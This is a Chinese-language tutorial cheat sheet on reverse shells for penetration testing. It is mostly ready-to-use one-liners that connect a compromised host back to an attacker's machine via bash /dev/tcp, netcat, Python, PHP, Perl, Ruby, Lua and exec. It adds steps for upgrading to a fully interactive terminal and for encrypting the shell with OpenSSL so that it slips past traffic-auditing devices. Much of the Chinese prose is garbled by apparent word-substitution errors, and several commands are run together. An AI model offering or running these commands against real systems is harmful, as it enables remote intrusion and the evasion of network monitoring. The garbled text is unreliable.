shell是渗透中常用的名词,像getshell,webshell,反弹shell等等,都和shell干系。
百度百科阐明的shell:
在打算机科学中,Shell俗称壳(用来差异于核),是指“为利用者供应操作界
面”的软件(命令解析器)。它类似于DOS下的command.com和后来的
cmd.exe。它吸收用户命令,然后调用相应的运用程序。
大略说用户通过壳访问操作系统内核的做事,也便是由壳到内核,实行系统命令。
getshell:获取到目标的命令实行权限
webshell:指网站后门,通过web做事进行命令实行
反弹shell:把命令行的输入输出转移到其它主机
为什么要反弹shell
1、webshell下实行命令不交互,为了方便提权或其它操作必须要反弹shell。2、反弹shell相称于新增一个后门,当webshell被创造删除后权限不会丢失。
常用linux反弹shell的办法
利用whereis命令去确定目标支持的反弹方法。
whereis nc bash python php exec lua perl ruby
bash反弹shell
bash反弹是实战中用的最多的方法
nc -lvp 9999bash -i >& /dev/tcp/ip/port 0>&1
把命令拆开剖析:1、bash -i代表在本地打开一个bash2、/dev/tcp/是Linux中的一个分外设备,打开这个文件就相称于发出了一个socket调用,建立一个socket连接3、>&后面跟上/dev/tcp/ip/port这个文件代表将标准输出和标准缺点输出重定向到这个文件,也便是通报到远程vps4、远程vps开启对应的端口去监听,就会吸收到这个bash的标准输出和标准缺点输出。
nc反弹shell
须要目标主机安装了nc
nc ip port -e /bin/sh
利用其他版本的 nc
nc.traditional ip port -e /bin/sh
合营命名管道进行反弹:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc ip port >/tmp/f
python反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.1.1.1",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
首先利用socket与远程建立起连接,接下来利用到了os库的dup2方法将标准输入、标准输出、标准缺点输出重定向到远程,dup2这个方法有两个参数,分别为文件描述符fd1和fd2,当fd2参数存在时,就关闭fd2,然后将fd1代表的那个文件强行复制给fd2,在这里可以把fd1和fd2看作是C措辞里的指针,将fd1赋值给fd2,就相称于将fd2指向于s.fileno(),fileno()返回的是一个文件描述符,在这里也便是建立socket连接返回的文件描述符,打印出来数值为3
0代表标准输入、1代表标准输出、2代表标准缺点输出、3代表重定向到远程接下来利用os的subprocess在本地开启一个子进程,传入参数“-i”使bash以交互模式启动,标准输入、标准输出、标准缺点输出又被重定向到了远程,这样的话就可以在远程实行输入命令了。
php反弹shell
须要php关闭safe_mode选项,才可以利用exec函数。利用php的exec函数实行方法1反弹shell的命令
php- 'exec("/bin/bash -i >& /dev/tcp/ip/port")'
利用php的fsockopen去反弹shell
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'
其它反弹方法
exec反弹
0<&196;exec 196<>/dev/tcp/ip/port; sh <&196 >&196 2>&196
perl反弹
perl -e 'use Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
ruby反弹
ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
lua反弹
lua -e "require('socket');require('os');t=socket.tcp();t:connect('ip','port');os.execute('/bin/sh -i <&3 >&3 2>&3');"
获取一个完备交互shell
通过上述命令反弹shell得到的shell并不能称为完备交互的shell,常日称之为'哑'shell。常日存在以下缺陷
ctrl-c会中断会话无法正常利用vim等文本编辑器没有向上箭头利用历史无法实行交互式命令无法查看缺点输出无法利用 tab 命令补全无法操控jobcontrol因此有必要去获取一个完备交互的shell。1、在shell 中实行python,利用pty模块,创建一个原生的终端,命令如下:
python -c 'import pty; pty.spawn("/bin/bash")'
隐蔽
运行完后2、键入 Ctrl-Z停息任务,切回到 VPS 的命令行中;在 VPS 中实行:
stty raw -echo fg #将后台运行或挂起的任务切换到前台运行
3、在 shell 中实行,得到一个完备交互的shell,支持命令补全、历史命令查看、语法高亮、vim编辑等功能。
resetexport SHELL=bashexport TERM=xterm-256colorstty rows 54 columns 104
SSL流量加密
部分防护设备会对内外网传输流量进行审查,反弹shell实行命令都因此明文进行传输的,很随意马虎被查杀。因此须要将原始流量利用 openssl 加密,绕过流量审计设备。
1、首先vps上天生SSL证书的公钥/私钥对,信息
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
2、vps利用 OpenSSL 监听一个端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 8888
3、目标主机实行反弹加密shell
mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ip:port > /tmp/s; rm /tmp/s
反弹成功,成功吸收到ssl流量加密的shell。
参考链接
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheethttps://www.sohu.com/a/161766202_709042https://www.freebuf.com/vuls/211847.htmlhttps://www.freebuf.com/articles/system/178150.htmlhttps://zhuanlan.zhihu.com/p/138393396https://www.cnblogs.com/Dubing-ydfc/p/11749241.html
